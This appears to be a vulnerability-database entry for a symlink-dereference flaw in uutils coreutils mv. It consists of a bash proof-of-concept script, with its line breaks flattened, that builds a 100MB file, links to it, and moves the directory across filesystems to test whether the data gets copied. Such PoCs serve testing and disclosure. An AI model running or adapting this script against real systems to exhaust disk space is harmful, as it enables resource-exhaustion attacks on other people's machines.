CVE-2026-35365 uutils coreutils符号链接处理漏洞

#!/bin/bash # PoC for CVE-2026-35365: uutils coreutils mv symlink dereference # This script demonstrates the issue where mv copies the target of a symlink # instead of the symlink itself when moving across filesystem boundaries. # 1. Create a large dummy file to simulate resource exhaustion target mkdir -p /tmp/large_target dd if=/dev/zero of=/tmp/large_target/bigfile.bin bs=1M count=100 status=none # 2. Create a source directory (assuming /tmp is on a different partition than /home for real cross-fs test) # For demonstration, we will simulate the scenario. In a real exploit, ensure src and dst are different mounts. SRC_DIR="/tmp/poc_exploit_src" mkdir -p "$SRC_DIR" # 3. Create a malicious symlink pointing to the large data ln -s /tmp/large_target "$SRC_DIR/malicious_link" echo "[+] Directory structure created." echo " Source: $SRC_DIR" echo " Symlink: $SRC_DIR/malicious_link -> /tmp/large_target" # 4. Execute the move operation (using uutils mv) # If /tmp and /var are on different filesystems, this triggers the bug. # Adjust DEST_DIR to a different mount point to verify the exploit. DEST_DIR="/var/tmp/poc_exploit_dst" echo "[+] Attempting to move $SRC_DIR to $DEST_DIR..." echo "[!] If vulnerable, 'mv' will start copying 100MB of data instead of moving the link." # Note: Replace 'mv' with full path to uutils mv if testing specifically against that binary mv "$SRC_DIR" "$DEST_DIR" # 5. Check the result if [ -L "$DEST_DIR/malicious_link" ]; then echo "[+] SAFE: Symlink was preserved." elif [ -f "$DEST_DIR/malicious_link/bigfile.bin" ]; then echo "[!] VULNERABLE: Symlink was dereferenced. Data was copied." du -sh "$DEST_DIR/malicious_link" else echo "[-] Test failed to verify." fi # Cleanup rm -rf /tmp/large_target /var/tmp/poc_exploit_dst